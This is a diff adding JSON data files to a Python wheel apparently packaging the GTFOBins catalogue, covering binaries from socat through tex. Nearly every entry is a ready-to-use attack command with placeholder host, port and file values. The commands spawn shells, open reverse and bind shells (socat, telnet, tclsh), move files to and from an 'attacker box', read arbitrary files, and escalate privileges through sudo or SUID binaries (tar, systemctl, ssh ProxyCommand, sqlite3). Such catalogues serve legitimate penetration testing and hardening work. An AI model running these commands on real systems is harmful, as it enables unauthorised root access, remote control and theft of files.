gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/socat.json

@@ -0,0 +1,46 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "The resulting shell is not a proper TTY shell and lacks the prompt.",
+        "code": "socat stdin exec:/bin/sh\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "socat tcp-connect:[host]:[port] exec:/bin/sh,pty,stderr,setsid,sigint,sane\n"
+      }
+    ],
+    "bind-shell": [
+      {
+        "description": "Run 'socat FILE:`tty`,raw,echo=0 TCP:[host]:[port]' on the attacker box to connect to the shell.",
+        "code": "socat TCP-LISTEN:[port],reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Run 'socat -u tcp-listen:[port],reuseaddr open:[file],creat' on the attacker box to collect the file.",
+        "code": "socat -u file:[file] tcp-connect:[host]:[port]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Run 'socat -u file:[file] tcp-listen:[port],reuseaddr' on the attacker box to send the file.",
+        "code": "socat -u tcp-connect:[host]:[port] open:[file],creat\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The resulting shell is not a proper TTY shell and lacks the prompt.",
+        "code": "sudo socat stdin exec:/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
+        "code": "./socat tcp-connect:[host]:[port] exec:/bin/sh,pty,stderr,setsid,sigint,sane\n"
+      }
+    ]
+  }
+}

gtfo/data/soelim.json

@@ -0,0 +1,20 @@
+{
+  "description": "The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "soelim \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./soelim \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo soelim \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/sort.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "sort -m [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./sort -m [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo sort -m [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/split.json

@@ -0,0 +1,31 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "TF=$(mktemp)\nsplit [file] $TF\ncat $TF*\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "Command execution using an existing or newly created file.",
+        "code": "TF=$(mktemp)\nsplit --filter=[command] $TF\n"
+      },
+      {
+        "description": "Command execution using stdin (and close it directly).",
+        "code": "echo | split --filter=[command] /dev/stdin\n"
+      }
+    ],
+    "shell": [
+      {
+        "description": "The shell prompt is not printed.",
+        "code": "split --filter=/bin/sh /dev/stdin\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The shell prompt is not printed.",
+        "code": "split --filter=/bin/sh /dev/stdin\n"
+      }
+    ]
+  }
+}

gtfo/data/sqlite3.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "sqlite3 /dev/null '.shell /bin/sh'"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "sqlite3 /dev/null -cmd \".output [file]\" 'select \"DATA\";'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "sqlite3 << EOF\nCREATE TABLE t(line TEXT);\n.import [file] t\nSELECT * FROM t;\nEOF\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "sqlite3 << EOF\nCREATE TABLE t(line TEXT);\n.import [file] t\nSELECT * FROM t;\nEOF"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo sqlite3 /dev/null '.shell /bin/sh'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./sqlite3 /dev/null '.shell /bin/sh'"
+      }
+    ]
+  }
+}

gtfo/data/ss.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file content is actually parsed so only a part of the first line is returned as a part of an error message.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ss -a -F [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ss -a -F [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ss -a -F [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/ssh-keygen.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "library-load": [
+      {
+        "description": "",
+        "code": "ssh-keygen -D ./lib.so"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo ssh-keygen -D ./lib.so"
+      }
+    ],
+    "suid": [
+      {
+        "description": "",
+        "code": "./ssh-keygen -D ./lib.so"
+      }
+    ]
+  }
+}

gtfo/data/ssh.json

@@ -0,0 +1,38 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Reconnecting may help bypassing restricted shells.",
+        "code": "ssh localhost $SHELL --noprofile --norc"
+      },
+      {
+        "description": "Spawn interactive shell through ProxyCommand option.",
+        "code": "ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file to a SSH server.",
+        "code": "ssh [user@host] \"cat > [destination_file]\" < [source_file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file from a SSH server.",
+        "code": "ssh [user@host] \"cat [source_file]\" > [destination_file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file content is corrupted by error prints.",
+        "code": "ssh -F [file] localhost\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Spawn interactive root shell through ProxyCommand option.",
+        "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
+      }
+    ]
+  }
+}

gtfo/data/ssh_keyscan.json

@@ -0,0 +1,20 @@
+{
+  "description": "The file content is actually parsed so only a part of each line is returned as a part of an error message.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ssh-keyscan -f [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ssh-keyscan -f [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ssh-keyscan -f [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/start-stop-daemon.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "start-stop-daemon -n $RANDOM -S -x /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo start-stop-daemon -n $RANDOM -S -x /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/stdbuf.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "stdbuf -i0 /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./stdbuf -i0 /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo stdbuf -i0 /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/strace.json

@@ -0,0 +1,25 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        "description": "The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of 'strace - [data]'.",
+        "code": "strace -s 999 -o [file] strace - [data]\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "strace -o /dev/null /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./strace -o /dev/null /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo strace -o /dev/null /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/strings.json

@@ -0,0 +1,20 @@
+{
+  "description": "This only returns ASCII strings, thus it is not suitable for binary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "strings \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./strings \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo strings \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/su.json

@@ -0,0 +1,9 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "code": "sudo su"
+      }
+    ]
+  }
+}

gtfo/data/sysctl.json

@@ -0,0 +1,20 @@
+{
+  "description": "The '-p' argument can also be used in place of '-n'. In both cases though the output might get corrupted, so this might not be suitable to read binary files.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "/usr/sbin/sysctl -n \"/../../[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./sysctl -n \"/../../[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo sysctl -n \"/../../[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/systemctl.json

@@ -0,0 +1,21 @@
+{
+  "functions": {
+    "suid": [
+      {
+        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"[command] > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\n./systemctl link $TF\n./systemctl enable --now $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho /bin/sh >$TF\nchmod +x $TF\nsudo SYSTEMD_EDITOR=$TF systemctl edit system.slice\n"
+      },
+      {
+        "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"[command] > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nsudo systemctl link $TF\nsudo systemctl enable --now $TF\n"
+      },
+      {
+        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "code": "sudo systemctl\n!sh\n"
+      }
+    ]
+  }
+}

gtfo/data/tac.json

@@ -0,0 +1,20 @@
+{
+  "description": "Make sure that 'RANDOM' does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of 'RANDOM'-separated chunks.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "tac -s 'RANDOM' \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./tac -s 'RANDOM' \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tac -s 'RANDOM' \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/tail.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "tail -c1G [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./tail -c1G [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tail -c1G [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/tar.json

@@ -0,0 +1,51 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      },
+      {
+        "description": "This only works for GNU tar.",
+        "code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'"
+      },
+      {
+        "description": "This only works for GNU tar. It can be useful when only a limited command argument injection is available.",
+        "code": "TF=$(mktemp)\necho '/bin/sh 0<&1' > \"$TF\"\ntar cf \"$TF.tar\" \"$TF\"\ntar xf \"$TF.tar\" --to-command sh\nrm \"$TF\"*\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+        "code": "tar cvf [user@host]:[destination_file] [source_file] --rsh-command=/bin/ssh\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+        "code": "tar xvf [user@host]:[file] --rsh-command=/bin/ssh\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This only works for GNU tar.",
+        "code": "TF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@[file]@\" -OP \"$TF\" | tar x -P\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This only works for GNU tar.",
+        "code": "tar xf [file] -I '/bin/sh -c \"cat 1>&2\"'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/taskset.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "taskset 1 /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./taskset 1 /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo taskset 1 /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/tbl.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by additional text at the beginning.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "tbl [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./tbl [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tbl [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/tclsh.json

@@ -0,0 +1,25 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "echo 'set s [socket \"[host]\" [port]];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./tclsh\nexec /bin/sh -p <@stdin >@stdout 2>@stderr\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n"
+      }
+    ]
+  }
+}

gtfo/data/tcpdump.json

@@ -0,0 +1,15 @@
+{
+  "description": "These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the 'postrotate-command' to a small subset of predefined commands thus preventing the execution of the following.",
+  "functions": {
+    "command": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root\n"
+      }
+    ]
+  }
+}

gtfo/data/tee.json

@@ -0,0 +1,20 @@
+{
+  "description": "It can only append data if the destination exists.",
+  "functions": {
+    "file-write": [
+      {
+        "code": "echo DATA | ./tee -a [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo DATA | sudo tee -a [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "echo DATA | ./tee -a [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/telnet.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "BSD version only. Needs to be connected first.",
+        "code": "telnet [host] [port]\n^]\n!/bin/sh\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -lp [port]' on the attacker box to receive the shell.",
+        "code": "TF=$(mktemp -u)\nmkfifo $TF && telnet [host] [port] 0<$TF | /bin/sh 1>$TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "BSD version only. Needs to be connected first.",
+        "code": "sudo telnet [host] [port]\n^]\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "BSD version only. Needs to be connected first.",
+        "code": "./telnet [host] [port]\n^]\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/tex.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "tex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./tex --shell-escape '\\write18{/bin/sh}\\end'\n"
+      }
+    ]
+  }
+}